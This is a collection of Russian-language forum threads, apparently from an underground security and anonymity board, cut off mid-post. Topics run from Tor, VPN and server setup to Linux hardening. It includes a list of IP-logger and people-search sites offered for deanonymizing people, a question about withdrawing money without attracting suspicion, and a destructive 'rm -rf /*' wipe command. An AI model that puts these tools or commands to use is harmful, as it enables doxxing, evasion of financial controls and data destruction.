Мониторинг и Уведомления: Когда кто-то пытается взаимодействовать с Canary Token (например, открывает поддельный файл, переходит по поддельной ссылке или отправляет письмо на фиктивный адрес), система Canary Token регистрирует эту активность и отправляет уведомление владельцу с информацией о событии, такой как IP-адрес и время.

Реакция: После получения уведомления, владелец Canary Token может принимать меры по обеспечению безопасности, такие как блокировка IP-адреса, анализ журналов или обращение к службе безопасности для более подробного расследования.

Ловушки (или Canary tokens) представляют собой инструменты, используемые для обмана или обнаружения несанкционированных действий в цифровой среде. Вот более подробная информация о ловушках:

Типы ловушек: Существует несколько различных типов Canary tokens, которые вы можете использовать в зависимости от ваших потребностей:

Файловые ловушки: Это могут быть файлы, которые вы создаете и размещаете в определенных местах, например, на сетевых дисках или в облачных хранилищах данных.

URL-ловушки: Вы создаете поддельные URL-адреса и размещаете их на веб-сайтах, в электронных сообщениях или в других местах. Когда кто-то переходит по этому URL-адресу, это фиксируется.

Электронная почта: Вы создаете поддельный адрес электронной почты, и когда кто-то отправляет письмо на этот адрес, это также фиксируется.

Текстовые ловушки: Вы создаете текстовую строку, которую можно вставить в документы или базы данных, и когда эти документы открывают или обрабатывают, активируется ловушка.

Альтернативы Canary Tokens:

Honeypots: Это высокоинтерактивные системы, предназначенные для привлечения злоумышленников. Они создаются как уязвимые цели, которые могут быть атакованы, и затем регистрируют все действия злоумышленников для анализа.

Security Information and Event Management (SIEM) Systems: SIEM-системы собирают и анализируют данные о безопасности из различных источников, позволяя обнаруживать несанкционированные действия на основе анализа событий и поведения.

Заключение:

Canary Tokens представляют собой мощный инструмент для обнаружения несанкционированных действий в цифровой среде. Они могут быть использованы как часть стратегии информационной безопасности, чтобы защитить цифровые ресурсы и быстро реагировать на потенциальные угрозы. Однако, как и с любой технологией, важно использовать их с осторожностью и соблюдать законодательство и правила конфиденциальности при их применении.

Могут ли вебсайты определить список установленных расширений браузера (firefox)?

ID: 676533bbb4103b69df371a70
Thread ID: 81095
Created: 2023-02-02T07:14:22+0000
Last Post: 2023-04-13T21:45:57+0000
Author: chillco
Replies: 5 Views: 445

Здравствуйте.

В одной из тем со списком полезных расширений для firefox увидел как кто то написал, что устанавливая большое количество расширений (в том числе для защиты от фингерпринтинга), браузер, цитата "начинает светиться как новогодняя ёлка", мол браузеру добавляет уникальности список установленных расширений.
Это конечно так. Но может ли вебсайт получить список этих расширений?
Я не нашел способа определения списка установленных расширений с помощью JS в документации Firefox .

Согласно документации Chrome: "
Content scripts live in an isolated world, allowing a content script to make changes to its JavaScript environment without conflicting with the page or other extensions' content scripts.

An isolated world is a private execution environment that isn't accessible to the page or other extensions. A practical consequence of this isolation is that JavaScript variables in an extension's content scripts are not visible to the host page or other extensions' content scripts. The concept was originally introduced with the initial launch of Chrome, providing isolation for browser tabs.
"
Content script расширения браузера для хрома не может быть определен с помощью JS на странице, так как он выполняется в изолированном конктексте.
В этом случае я не учитываю мост между основным конктекстом и контекстом расширения, так как предполагаю что изменения сделанные явно на странице расширением могут в большинстве случаев не могут определить наличие этого расширения.

Однако, согласно документации Firefox: "There is only one global scope per frame, per extension. This means that variables from one content script can directly be accessed by another content script, regardless of how the content script was loaded."
Все content скрипты выполняются в одном контексте. Однако тот же ли это конктекст что и у самой страницы вебсайта?
Имеет ли страница вебсайта открытая в Firefox доступ к переменным content скриптов, для того что бы потенциально определять наличие конкретных расширений эвристическим методом?

Расширения для браузеров я не разрабатывал и имею ограниченное представление об этом, поэтому поправьте если где ошибся.

Как по другому расширения (список или конкретное расширение) могут быть определены?
Спасибо!

mikrotik + tor

ID: 676533bbb4103b69df371b2d
Thread ID: 64578
Created: 2022-03-21T09:22:49+0000
Last Post: 2022-03-23T12:29:37+0000
Author: team_RX
Replies: 9 Views: 444

Знает кто как mikrotik цепануть к сети tor?

Совет по регистрации жабы

ID: 676533bbb4103b69df371b93
Thread ID: 57608
Created: 2021-10-12T03:29:59+0000
Last Post: 2021-10-15T20:48:43+0000
Author: El Gordo
Replies: 8 Views: 444

Добрый день. Подскажите пожалуйста безопасный сервис для жабы по мимо Thesecure и exploit. Сервисов много, но гарантий нет. Может кто знает проверенные? Что бы логи не вели и не собирали IPшники.

Сервисы, чекеры, проверка анонимности и безопасности

ID: 676533bbb4103b69df371a8e
Thread ID: 57437
Created: 2021-10-06T14:00:45+0000
Last Post: 2022-12-23T09:54:49+0000
Author: devcry
Replies: 3 Views: 441

Предлагаю вниманию подборку чекеров для проверки вашей (условной) анонимности и безопасности (и качества работы антидетект браузеров). Если есть чем дополнить\улучшить список, предлагаю писать в комментариях. Всем мир!

Pixelscan

Pixelscan is a one-and-done solution to detect internet bots and manually- controlled browsers with irregular connections between browser fingerprint parameters.

pixelscan.net

![panopticlick.eff.org](/proxy.php?image=https%3A%2F%2Fcoveryourtracks.eff.org%2Fstatic%2Fimages%2Fcyt- banner.png&hash=bdcbfbdf2cc701b8833f90bb0e0e66fa&return_error=1)

Cover Your Tracks

See how trackers view your browser

panopticlick.eff.org

Am I Unique ?

Check if your browser has a unique fingerprint, how identifiable you are on the Internet

amiunique.org

https://www.ipqualityscore.com/free-ip-lookup-proxy-vpn-test/ (проверит качество вашего IP)

Unique Machine

uniquemachine.org

[ Device Info - Web browser security, privacy, and troubleshooting tool.

](https://www.deviceinfo.me)

Device Info is a web browser security testing, privacy testing, and troubleshooting tool.

www.deviceinfo.me

[ Browserleaks - Check your browser for privacy leaks

](https://browserleaks.com)

BrowserLeaks is a suite of tools that offers a range of tests to evaluate the security and privacy of your web browser. These tests focus on identifying ways in which websites may leak your real IP address, collect information about your device, and perform a browser fingerprinting.

browserleaks.com

Home - Privacy.net

Privacy.net exists to help guard your privacy and security online. We highlight some of the violations of privacy by governments, corporations and hackers that most of the general public either ignore or simply are not aware of.

![privacy.net](/proxy.php?image=https%3A%2F%2Fprivacy.net%2Fwp- content%2Fthemes%2Fprivacynet%2Ffavicon.ico&hash=0fead830d6c67729120fc719e75cf586&return_error=1) privacy.net

Find and check IP address

What's my IP address, how to find and check my IP address. Two versions of anonymity check: light and extended

whoer.net

[ Прокси Чекер: проверка прокси онлайн на Proxy Checker ](https://proxy-

checker.net)

Проверьте прокси онлайн с помощью Proxy Checker ⭐️ Быстрая и надежная проверка прокси чекером ⭐️ Узнайте доступность прокси серверов прямо сейчас!

![proxy-checker.net](/proxy.php?image=https%3A%2F%2Fproxy-checker.net%2Fwp- content%2Fuploads%2F2022%2F12%2Fmail-1.png&hash=c176e8616e767ccd1df87838b9e01b3b&return_error=1) proxy-checker.net

https://whatleaks.com

Am I Unique ?

Check if your browser has a unique fingerprint, how identifiable you are on the Internet

amiunique.org

Fake Vision | Beta v1.1

![www.f.vision](/proxy.php?image=http%3A%2F%2Fwww.f.vision%2Fassets%2Fimg%2Ffavicons%2Fandroid- icon-192x192.png&hash=432ff318dc22f5f9d56e1f378925b242&return_error=1) www.f.vision

https://fingerprintjs.com (базовый уровень, его обязан проходить любой антидетект)

SSL Fingerprint JA3

Displays your JA3 SSL finger print

ja3er.com

AudioContext Fingerprint Test Page

WebBrowserTools

The community of open-source projects to help improve the privacy and security of your online appearance

webbrowsertools.com

https://antcpt.com/eng/information/demo-form/recaptcha-3-test-score.html (капча скор)

DNS Leak Test | Perfect Privacy

Visit our free DNS Leak Test to check your VPN - Perfect Privacy VPN protects from leaks ✓ Anonymous VPN since 2008 - Our mission is your internet privacy!

![www.perfect-privacy.com](/proxy.php?image=https%3A%2F%2Fwww.perfect- privacy.com%2Ffavicon.ico&hash=0f9ac91daa608d8e80b40329a8a38581&return_error=1) www.perfect-privacy.com

Free Proxy / VPN / TOR / Bad IP Detection via API and Web Interface | IP Intelligence

Free Proxy VPN TOR detection to prevent fraud, stolen content, and malicious users. Block proxies, VPN connections, web host IPs, TOR IPs, and compromised systems with a simple API. GeoIP lookup available.

getipintel.com

IP Address Fraud Check

Lookup any IP address to fraud check that IP. Check the fraud score, view supporting information including true country, operator, proxy status, and Tor status.

![scamalytics.com](/proxy.php?image=https%3A%2F%2Fscamalytics.com%2Fwp- content%2Fuploads%2F2016%2F06%2Ficon_128.png&hash=bbb952377b42d6d2bd27597d5acd7b49&return_error=1) scamalytics.com

https://webcamtests.com (https://webcamtests.com/) (чекер вебкамеры)
https://www.spamhaus.org/lookup (https://www.spamhaus.org/lookup/)/ (проверьте свой IP в базах Spamhaus)
https://lampyre.io (https://lampyre.io/) (сервис проверки репутации)
http://dnscookie.com (http://dnscookie.com/) (проверь свои днс куки)
https://www.shodan.io (https://www.shodan.io/) (покажет открытые порты)
https://whatismyiplookup.com (https://whatismyiplookup.com/)/ (есть внутренний FraudScore, показывает гео на карте)
https://www.tomanthony.co.uk/tools/detect-social-network-logins (https://www.tomanthony.co.uk/tools/detect-social-network-logins/)/ (проверка авторизации в социальных сетях)

Кибербезопасность. Как защитить личные и корпоративные цифровые активы (2022)

ID: 676533bbb4103b69df371a0a
Thread ID: 97844
Created: 2023-09-11T16:12:22+0000
Last Post: 2023-09-11T16:12:22+0000
Author: x00c4sub
Prefix: Мануал/Книга
Replies: 0 Views: 440

Электронный учебник – сборник материалов, изучив который вы сможете получить краткое и емкое представление о личной и корпоративной кибербезопасности.
– Какие тактики применяют кибермошенники?
– Как грамотно противостоять манипуляциям кибермошенников?
– Как распознавать фишинговые письма и не переходить по вредоносным ссылкам, защищать свои данные и безопасно общаться в соцсетях?
На изучение вам потребуется 50 минут. В конце вас ждут вопросы для проверки усвоения материала.

Файл из Облака Mail.ru

Вам открыли доступ к файлу. Отправлено с помощью Облако Mail.ru.

cloud.mail.ru

Сайты для деанона

ID: 676533bbb4103b69df371b0c
Thread ID: 67738
Created: 2022-05-27T14:00:08+0000
Last Post: 2022-05-27T22:18:14+0000
Author: sarok
Replies: 5 Views: 439

Собрал для вас список:
https://rulait.github.io/vk-friends-saver/
http://archive.is/

http://peeep.us/

[ Internet Archive: Digital Library of Free & Borrowable Texts, Movies,

Music & Wayback Machine ](https://archive.org/)

archive.org

http://www.cachedpages.com/
http://skyperesolver.net/

IP Logger URL Shortener - Log and Track IP addresses

IP Logger URL Shortener allows to track IP address and track location, provides IP lookup and IP grabber services and let you check what is my ip, use website counters and IP informers.

yip.su

https://vedbex.com/tools/iplogger
http://phoneradar.ru/phone/
http://afto.lol/
http://zaprosbaza.pw/

Radaris Россия: Найти человека по фамилии бесплатно | Поиск людей – по фамилии, телефону или адресу.

Ð¡Ð¸ÑÑÐµÐ¼Ð° Ð¿Ð¾Ð¸ÑÐºÐ° Ð»ÑÐ´ÐµÐ¹ Radaris Ð¿Ð¾Ð·Ð²Ð¾Ð»ÑÐµÑ ÐÐ°Ð¼ Ð½Ð°ÑÐ¾Ð´Ð¸ÑÑ Ð¸ Ð¾ÑÑÐ»ÐµÐ¶Ð¸Ð²Ð°ÑÑ Ð»ÑÐ±Ð¾Ð³Ð¾ ÑÐµÐ»Ð¾Ð²ÐµÐºÐ° Ð¾Ð½Ð»Ð°Ð¹Ð½. ÐÐ°ÑÐ¸ Ð°ÑÑÐ¸Ð²Ñ ÑÐ¾Ð´ÐµÑÐ¶Ð°Ñ ÑÐµÐºÑÑÐ¸Ðµ Ð°Ð´ÑÐµÑÐ°, Ð½Ð¾Ð¼ÐµÑÐ° ÑÐµÐ»ÐµÑÐ¾Ð½Ð¾Ð² Ð¸ Ð´ÑÑÐ³ÑÑ Ð¸Ð½ÑÐ¾ÑÐ¼Ð°ÑÐ¸Ñ.

radaris.ru

https://service.nalog.ru/inn.html
http://services.fms.gov.ru/info-service.htm?sid=2000
https://2ch.hk/b/

![sonetel.com](/proxy.php?image=https%3A%2F%2Fsonetel.com%2Fwp- content%2Fuploads%2F2019%2F09%2Fhome-page-featured- image.png&hash=b0e7893236ea01ef13467c33718002de&return_error=1)

Startseite

Erhalte deine eigene geschäftliche Telefonnummer in jeder Stadt und jedem Land deiner Wahl. Nimm Anrufe überall entgegen. Ab 1,79 € pro Monat.

sonetel.com

http://psi-im.org/
https://discordapp.com/

Home | Viber

![viber.com](/proxy.php?image=https%3A%2F%2Fwww.viber.com%2Fapp%2Fthemes%2Fviber%2Fassets%2Fimages%2Ffavicon-v2%2Fandroid- icon-192x192.png&hash=c377ea8da04d434a137bc037acf509dc&return_error=1) viber.com

[ Free VPN • 100% Free PPTP and OpenVPN Service

](http://www.vpnbook.com/)

Free VPN Service – VPNBook.com is the #1 premium Free VPN Server account provider. US, UK, and offshore VPN servers available.

www.vpnbook.com

https://www.vpnkeys.com/
https://www.tcpvpn.com/
https://prostovpn.org/

https://lightvpn.pro/

http://spys.ru/

Safe-Inet :: This domain has been seized

insorg.org

http://sockshub.net/
http://www.cekpr.com/decode-short-url/

Temp Mail - Disposable Temporary Email

Keep spam out of your mail and stay safe - just use a disposable temporary email address! Protect your personal email address from spam with Temp-mail

![temp-mail.org](/proxy.php?image=https%3A%2F%2Ftemp- mail.org%2F&hash=c535c0ebff77f8a008c287eff18cb977&return_error=1) temp- mail.org

How to Enable Cookies

![blockchain.info](/proxy.php?image=https%3A%2F%2Fwww.blockchain.com%2Fexplorer- frontend%2F_next%2Fimage%3Furl%3D%2Fimages%2Fexplorer_og.png%26w%3D384%26q%3D75&hash=7afcff259027807d7dd1cbdf430f84c5&return_error=1)

Blockchain.com Explorer | BTC | ETH | BCH

The easiest and most trusted transaction search engine and block explorer.

blockchain.info

https://blackbiz.ws/

https://darkwebs.cc/

https://zblock.co/

https://newage-bank.com/

upbitcoin.com

TomyGame.com : Welcome To TomyGame.com!

TomyGame - Tom & Jerry Online Games

tomygame.com

[ FreeBitco.in - Bitcoin, Bitcoin Price, Free Bitcoin Wallet, Faucet,

Lottery and Dice! ](https://freebitco.in/)

Win upto $200 in Bitcoins every hour, no strings attached! Multiply your bitcoins, free weekly lottery with big prizes, 50% referral commissions and much more!

freebitco.in

GR8 Scripts

VPN под любые цели

ID: 676533bbb4103b69df371bcd
Thread ID: 54703
Created: 2021-08-02T12:00:12+0000
Last Post: 2021-08-02T12:04:11+0000
Author: Espectro
Replies: 1 Views: 431

Добрый день, подскажите vpn сервис под любые цели.

Shadowsocks, обсуждение (не скрывает айпи при подключение к rpd!)

ID: 676533bbb4103b69df371a10
Thread ID: 97185
Created: 2023-09-03T13:23:30+0000
Last Post: 2023-09-06T18:55:43+0000
Author: CheckData
Replies: 3 Views: 428

Shadowsokcs не скрывает айпи при подключение к rpd! Что делать в этом случае ?

"mode":"tcp_and_udp",
"method":"chacha20-ietf-poly1305"
Включен такой мод, но не помогает

Cwtch мессенджер, обсуждение

ID: 676533bbb4103b69df371a3d
Thread ID: 92096
Created: 2023-07-04T20:12:23+0000
Last Post: 2023-07-12T15:06:00+0000
Author: vacon
Replies: 1 Views: 428

Hello to the members of this forum,

Recently someone sold https://qtox.github.io 0-day RCE for windows https://github.com/Zoxcore/qTox_enhanced/issues/6.
It is yet unpatched in the original because qtox development has been stopped. Most users of this forum has been using this instant messenger.
Other tox clients- https://tox.chat/clients.html are unmaintained as well, except few like Toxic (cli client for unix-like system) and aTox for android.

If you look at tox chat https://toktok.ltd core/protocol development itself https://github.com/TokTok/c-toxcore
, the code is forked from original developer and it is yet unaudited which presents heavier security risk. Also there are some development issues due to lack of resources (developers, time and money) and some issues in the protocol itself such as https://github.com/TokTok/c-toxcore/issues/426 and group-chat issues.
Developer said most part of code is needs to be refactored and protocol needs to be rewritten, which is going to take very long time. Anonymity and meta- data resistant is out of scope for this project. However, in modern times government all over the world are outlawing privacy and bringing laws to backdoor clients (China already does). They are already monitoring internet through wires, corelating users and censoring specific protocols, it becomes very important to have anonymity and privacy.
They are already able to indentify your IP regardless of if you use tor network or not. Examples: <https://www.team-cymru.com/post/inside-the-icedid- backconnect-protocol>, <https://www.team-cymru.com/post/inside-the-v1-raccoon- stealer-s-den>, <https://www.team-cymru.com/post/darth-vidar-the-aesir-strike- back>

There are some alternative to tox messenger.
cwtch.im - https://git.openprivacy.ca/cwtch.im, https://news.ycombinator.com/item?id=17692521, https://news.ycombinator.com/item?id=27643171

- The protocol is extension to well-known ricochet.im to support group chat.
- It is p2p like tox but attached with tor network.
- It has been audited.
- Active development, clients available for windows, linux/unix
- It is metadata resistant.

I think it well fits my purpose, and thinking to move to cwtch very soon. please leave your suggestions.
admin

LFCA – Полезные советы по защите данных Linux

ID: 676533bbb4103b69df371a5a
Thread ID: 88583
Created: 2023-05-22T10:10:59+0000
Last Post: 2023-05-22T19:43:10+0000
Author: DedJhones
Prefix: Статья
Replies: 5 Views: 428

Советы по усилению защиты Linux сервера

Обеспечить безопасность вашего Linux-сервера не так сложно, как вы думаете. Мы составили список лучших политик безопасности, которые вам необходимо реализовать для повышения безопасности вашей системы и поддержания целостности данных. Если вы используете системы на основе Ubuntu или Debian, первым шагом обычно является обновление индекса пакетов или репозиториев, как показано далее.

Чтобы проверить наличие всех пакетов с доступными обновлениями, выполните команду:

sudo apt list --upgradable

Обновите свои программные приложения до их текущих версий, как показано далее:

sudo apt upgrade

Вы можете объединить эти две команды в одну, как показано далее:

sudo apt update && sudo apt upgrade

Для RHEL и CentOS обновите свои приложения, выполнив команду:

sudo dnf update ( CentOS 8 / RHEL 8 ) sudo yum update ( Earlier versions of RHEL & CentOS )

2. Удалите устаревшие службы/протоколы связи.

Несмотря на поддержку множества удаленных протоколов, унаследованные службы, такие как rlogin, telnet, TFTP и FTP, могут создавать огромные проблемы безопасности для вашей системы. Это старые, устаревшие и небезопасные протоколы, в которых данные отправляются в виде обычного текста.

Если они существуют, рассмотрите возможность их удаления, как показано далее:

sudo apt purge telnetd tftpd tftpd-hpa xinetd rsh-server rsh-redone-server

В системах на базе RHEL/CentOS выполните:

sudo yum erase xinetd tftp-server telnet-server rsh-server ypserv

3. Закройте неиспользуемые порты на брандмауэре.

После того, как вы удалили все небезопасные службы, важно просканировать ваш сервер на предмет открытых портов и закрыть все неиспользуемые порты, которые потенциально могут быть использованы хакерами в качестве точки входа.

Предположим, вы хотите заблокировать порт 7070 на брандмауэре UFW.

Команда для этого будет такая:

sudo ufw deny 7070/tcp

Затем перезагрузите брандмауэр, чтобы изменения вступили в силу.

sudo ufw reload

В случае Firewalld выполните команду:

sudo firewall-cmd --remove-port=7070/tcp --permanent

И не забудьте перезагрузить брандмауэр.

sudo firewall-cmd --reload

Затем перепроверьте правила брандмауэра, как показано далее:

sudo firewall-cmd --list-all

4. Обезопасте протокол SSH

Протокол SSH – это удаленный протокол, который позволяет вам безопасно подключаться к другим устройствам в сети. Хотя он считается безопасным, настроек по умолчанию недостаточно, и требуются некоторые дополнительные настройки, чтобы еще больше удержать злоумышленников от взлома вашей системы.

Основные моменты:

Настройте вход по SSH без пароля и включите аутентификацию с закрытым / открытым ключом.

Отключите удаленный вход пользователя root по SSH.

Отключите вход по SSH для пользователей с пустыми паролями.

Полностью отключите аутентификацию по паролю и придерживайтесь аутентификации с закрытым / открытым ключом SSH.

Ограничьте доступ определенным пользователям по SSH.

Настройте ограничение на количество попыток ввода пароля.

5. Установите и включите Fail2ban/Crowdsec.

Fail2ban – это система предотвращения вторжений с открытым исходным кодом, которая защищает ваш сервер от атак брута.

6. Обеспечьте надежность пароля с помощью модуля PAM.

Повторное использование паролей или использование слабых и простых паролей значительно подрывает безопасность вашей системы. Вы должны применять политику паролей, используя pam_cracklib для установки или настройки требований к надежности пароля. Используя модуль PAM, вы можете определить надежность пароля, отредактировав файл /etc/pam.d/system-auth. Например, вы можете установить сложность пароля и предотвратить повторное использование паролей.

7. Установите сертификат SSL/TLS.

Если у вас есть веб-сайт, всегда обеспечивайте безопасность своего домена с помощью сертификата SSL/TLS для шифрования данных, которыми обмениваются браузер пользователя и веб-сервер.

8. Отключите слабые протоколы шифрования и ключи шифрования.

После того, как вы зашифруете соединение с сайтом, подумайте также об отключении слабых протоколов шифрования. На момент написания этого руководства последним протоколом был TLS 1.3, который является наиболее распространенным и широко используемым протоколом. Более ранние версии, такие как TLS 1.0, TLS 1.2 и SSLv1 to SSLv3, были связаны с известными уязвимостями.

Сколько можно выводить на свою карту и как часто?

ID: 676533bbb4103b69df3719e0
Thread ID: 102611
Created: 2023-11-20T16:21:25+0000
Last Post: 2023-11-21T17:58:11+0000
Author: acidrain999
Replies: 5 Views: 423

Сколько и как часто можно выводить рубли себе на карту, чтобы не было подозрений? Если учесть, что рубли чистые

Who knows this software?

ID: 676533bbb4103b69df371b4b
Thread ID: 58350
Created: 2021-10-30T19:28:09+0000
Last Post: 2022-02-05T17:53:35+0000
Author: moxmooy
Replies: 4 Views: 420

En: Hey guys. Someone told me that he is using a tool that can modify real- time positioning on mobile and the screenshot is as follows. Anybody knows what's the name of this software / tools? Thank you.

Ru: Привет, ребята. Кто-то сказал мне, что он использует инструмент, который может изменять позиционирование в реальном времени на мобильных устройствах, и скриншот выглядит следующим образом. Кто-нибудь знает, как называется это программное обеспечение / инструмент? Спасибо.

RDP over TOR. Подключаемся к RDP через TOR. Анонимный RDP

ID: 676533bbb4103b69df3719a7
Thread ID: 107444
Created: 2024-02-04T11:36:54+0000
Last Post: 2024-02-14T16:47:47+0000
Author: ThorZirael
Prefix: Видео
Replies: 2 Views: 419

Подключаемся к RPD через TOR. Анонимно используем RDP.

Программы используемые в видео.

_https://www.torproject.org/download/tor/

_https://nssm.cc/download

_https://processhacker.sourceforge.io/downloads.php

_https://www.parallels.com/products/ras/download/client/

_https://www.7-zip.org/download.html

Конфиг для torrc

HiddenServiceDir C:\Windows\System32\config\systemprofile\AppData\Roaming\tor\hs
HiddenServicePort 80 127.0.0.1:3389

Мое авторское видео. Задаем вопросы, пишем идеи для следующего видео. Буду рад.

ProtonMail is sneaky

ID: 676533bbb4103b69df371bca
Thread ID: 54707
Created: 2021-08-02T14:10:27+0000
Last Post: 2021-08-02T20:01:19+0000
Author: splintkry
Replies: 1 Views: 416

This is what ProtonMail says on their site regarding creating a new mail address and it only provides Email/SMS for options.

If you are only given the option of Email or SMS verification, and would like to avoid using Email or SMS verification, it is possible to do so by upgrading to a premium account using PayPal or Bitcoin. To do so, please email us at contact@protonmail.ch

Click to expand...

It wants us to contact them before hand to create a contact which will be stored. ?

Git\Ssh and others over TOR.

ID: 676533bbb4103b69df3719b7
Thread ID: 106358
Created: 2024-01-22T00:31:05+0000
Last Post: 2024-01-31T12:17:14+0000
Author: ice80
Replies: 4 Views: 414

Под винду-мастдайку:

Download https://github.com/shunf4/proxychains-windows

Add environment variable PROXYCHAINS_CONF_FILE -> your proxychains bin\proxychains.conf

Edit proxychains.conf and find [ProxyList] then change to socks5 127.0.0.1 9150

proxychains_win32_x64.exe git clone http://rexw3wrz5pldtadf3hy4vqnuzokhco4l32kyntj36fcgpjuy3nvxidid.onion/gmh5225/Theodosius.git

Easy way for git:

git config –global http.proxy “socks5h://127.0.0.1:9150”

git config –global –unset http.proxy

https://stackoverflow.com/questions/40857891/can-anyone-access-pluggable-transports-meek-git

украдено тут: https://gmh5225.github.io/using-git-on-tor/

Смысл думаю понятен.

Для любителей туннелиться есть еще такое:

[ GitHub - nlzy/nsproxy: Make arbitrary applications to use a specified

SOCKS / HTTP proxy ](https://github.com/nlzy/nsproxy)

Make arbitrary applications to use a specified SOCKS / HTTP proxy - nlzy/nsproxy

github.com

вышеупомянутое умеет в проксирование статически-линкованого - тоесть блядский голанг оно сможет тоже
( но не умеет заворачивать на локалхост )

Зачем все это? - я часто встречаю чуваков которые не вкурсе что ссш или гит можно через тор.

#v_zakrep_pls
Quake3

пингую gliderexpert - глянь: https://github.com/robherley/snips.sh
возможно тебе захочется деплоить еще инстнас и у нас будет народный TUI- pastebin - ну или еще кто подтянется.

Thx!

Удаление данных с удаленного дедика

ID: 676533bbb4103b69df371ba8
Thread ID: 56406
Created: 2021-09-08T06:32:56+0000
Last Post: 2021-09-09T16:43:37+0000
Author: zer0_day
Replies: 9 Views: 413

Интересует способ безвозвратного удаление всех данных с удаленного сервера (на базе Linux), в том числе самой ОС. Права рутовые.
sudo rm -rf /* не дает нужного результата.

[?] Обход блокировок в Туркменистане. Вопрос.

ID: 676533bbb4103b69df371992
Thread ID: 109240
Created: 2024-02-28T09:23:17+0000
Last Post: 2024-03-19T06:07:23+0000
Author: ThorZirael
Replies: 2 Views: 412

Друзья вопрос, в Туркменистане пздц не здоровая движуха, все не резидентские пулы ip в блоке, найти что-то что не в блоке это просто удача. Ни Ажур, ни Google, ни амазон не работает, т.е. ip сразу в блоке, ни о каком v2ray\xray речи и не идет, т.к. к ip просто нет коннекта.

С сети попадаются конфиги v2ray\xray c резидентскими ip LTE https://www.telia.fi/ , https://vodafone.de/ , https://www.bworld.co.kr/. Вопрос как они делают эти конфиги на этих резидентских LTE, если сервисы не дают VPS у них там поднять?

Не нужно про туннели на SSH которые работают везде, это понятно, тут еще нужно удобство для юзера, и работает даже там обычный SS, вопрос лишь в том где его разместить.

Поднимаем свой e-mail сервис за 30 минут

ID: 676533bbb4103b69df371a41
Thread ID: 92315
Created: 2023-07-07T15:12:26+0000
Last Post: 2023-07-07T20:49:07+0000
Author: baykal
Prefix: Статья
Replies: 1 Views: 410

Поднимаем свой e-mail сервис за 30 минут

В данной статье я опишу процесс того, как поднять собственный почтовый сервис на iRedMail, чтобы получить почтовый ящик, который вы полностью контролируете, для этого нам понадобится выделенный сервер (производительность зависит от того, сколько пользователей будет на вашем сервере) и домен.

И так, приступим.

Для начала вам нужно сделать соответствующие DNS записи к вашему домену
Должна быть A запись, которая соотнесет ваш сервер и поддомен mail вашего основного домена и MX запись, которая соотнесет ваш основной домен и поддомен mail для получения электронной почты.

Подключаемся к серверу по SSH:

Code:Copy to clipboard

ssh root@ip-адрес-сервера

В файл /etc/hosts на сервере внесите следующие строки:

Code:Copy to clipboard

127.0.1.1 mail.example.com mail 127.0.0.1 mail.example.com mail localhost localhost.localdomain 123.123.123.123 mail.example.com mail

example.com заменяйте на свой домен
123.123.123.123 заменяйте на ip-адрес вашего сервера

В терминале вводим команду:

Code:Copy to clipboard

sudo apt install wget

Теперь скачаем архив с установщиком iRedMail, для этого переходим на сайт (https://www.iredmail.org/download.html), правой кнопкой нажимаем на зеленый прямоугольник с надписью STABLE и выбираем пункт “копировать ссылку”

В терминале вводим команду:

Code:Copy to clipboard

wget сюда_вставить_ссылку

Должно получиться примерно следующим образом:

Code:Copy to clipboard

wget https://github.com/iredmail/iRedMail/archive/refs/tags/1.6.2.tar.gz

Ждем окончания загрузки.

Теперь распакуем архив командой:

Code:Copy to clipboard

tar -xf имя_файла.tar.gz

Пример:

Code:Copy to clipboard

tar -xf 1.6.2.tar.gz

Чтобы узнать имя архива, введите команду:

Code:Copy to clipboard

ls

Эта команда покажет список файлов в директории, в которой вы находитесь.
Теперь перейдем в папку с распакованными файлами командой:

Code:Copy to clipboard

cd имя_папки

Пример:

Code:Copy to clipboard

cd iRedMail-1.6.2

Сделаем файл установщика исполняемым командой:

Code:Copy to clipboard

chmod +x iRedMail.sh

Запустим установщик командой:

Code:Copy to clipboard

./iRedMail.sh

Во время установки выскочит окно с некоторыми уточнениями конфигурации установки.

Здесь жмем Enter

На этапе Default Mail Storage path ничего не меняем, жмем Enter

Preferred web server – жмем Enter, ничего не меняем

Choose preferred backend used to store mail accounts

С помощью пробела выбираем СУБД (рекомендую MariaDB или PostgreSQL)

Далее задаем пароль базы данных

Далее вводим доменное имя, которое будет отображаться после @ в сообщении

Пример – example.com

Далее задать пароль для аккаунта администратора

Далее просто Enter, ничего не меняя

Далее вводим 'y' в терминале, жмем Enter и продолжаем установку

На этапе

Code:Copy to clipboard

Would you like to use firewall rules provides by iRedMail

Вводим 'у' и жмем Enter

На этапе

Code:Copy to clipboard

Restart firewall now?

Вводим ‘у’ и Enter

Установка завершится, после этого перезагружаем сервер и проверяем работоспособность почты, перейдя по адресу вашего сайта
Браузер ругнется на SSL-сертификат, игнорируем это, в дальнейшем можно будет добавить SSL-сертификат от Let’s Encrypt.

В админ-панель почтового сервера можно добавив в адресной строке браузера /iredadmin к адресу вашего почтового сервера.

К примеру mail.example.com/iredadmin

Логин для входа в аккаунт администратора – postmaster@ваш_домен
Пример – postmaster@example.com
Пароль вы задавали при установке

Всё готово, теперь у вас есть собственная почта.

автор CyberSec
источник RuTOR

Настраиваем obfs4 мосты на WhonixCLI

ID: 676533bbb4103b69df3719f7
Thread ID: 99963
Created: 2023-10-12T19:52:40+0000
Last Post: 2023-10-21T11:17:32+0000
Author: adhi
Replies: 3 Views: 409

Всех приветствую.

Сегодня поговорим о настройке obfs4 мостов на Whonix-Gateway-CLI.

Что это за мосты такие и где берутся?

Суть в том, что ваш интернет провайдер (ISP) прекрасно видит что вы соединяетесь с сетью Tor. А с внедрением технологий DPI (Deep Packet Inspection) позволяет ещё и блокировать отдельно этот трафик, что и произошло в РФ не так давно, в исторических масштабах. Мост же помогает войти в сеть Tor, не палясь при этом у провайдера, то есть он не будет видеть что этот трафик идёт в Tor или из него. Можно сказать аналог VPN внутри самого Tor, хотя это утверждение очень грубое и не совсем верное.

Мосты же можно взять либо в самом Tor браузере, об этом советую почитать на их сайте, либо в Телеграм ботах и каналах. Мосты регулярно обновляются.

https://t.me/tor_bridges - основной канал.
https://t.me/vanilla_bridges - раздача ванильных (в данном случае, тестовых) мостов.
https://t.me/GetBridgesBot - бот раздающий мосты.

Теперь о настройке Whonix.
Мы будем использовать версию без GUI. К делу.

В файле /usr/local/etc/torrc.d/50_user.conf требуется добавить две строки

UseBridges 1 ClientTransportPlugin obfs4 exec /usr/bin/obfs4proxy

и уже ниже добавлять мосты взятые из источников приведённых выше после ключевого слова Bridge.

То есть сам файл требуется привести к следующему виду

Bash:Copy to clipboard

